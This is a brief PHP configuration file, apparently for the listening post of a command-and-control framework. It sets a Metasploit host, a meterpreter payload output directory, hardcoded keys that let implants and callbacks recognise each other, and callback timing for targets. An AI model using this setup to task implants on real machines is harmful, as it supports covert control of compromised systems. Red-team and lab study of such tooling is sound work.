<?php
error_reporting(0);
ini_set('display_errors', 0);
$DELIMITER1 = '&'; //DELIMITER FOR TASKS FOR TARGET
$DELIMITER2 = '|'; //DELIMITER FOR TASKS FOR TARGET
$GOODCHAR = '~'; //REPLACE ALL THE + WITH ~
$BADCHAR = '+'; 
$METASPLOIT = "192.168.20.133";
$OUTPUTDIR = '/var/www/html/down/'; //OUTPUT DIRECTORY FOR METERPRETER CREATOR
$HTMLKEY = 'stup1fy'; //KEY IN HTML SO IMPLANT KNOWS TASKS FOLLOW
$POSTKEY = '123spec!alk3y456'; //KEY IN POST VARIABLE SO LP KNOWS TARGET IS CALLING BACK
$DEFAULTCB = 10; //DEFAULT CALLBACK PERIOD FOR NEW TARGETS/FIRST TIME TARGET CALLS BACK
$ENCKEY = 'ZAQwsxcde321'; 
$SERVERADDR = $_SERVER['HTTP_HOST']; 
$DECONFLICT = 0; //IN ENVIRONMENTS WHERE TARGETS WILL HAVE THE SAME HOSTNAME AND GUID (VMs THAT ARE CLONED), APPEND EXTERNAL IP ADDRESS TO MAKE EACH TARGET NAME UNIQUE
?>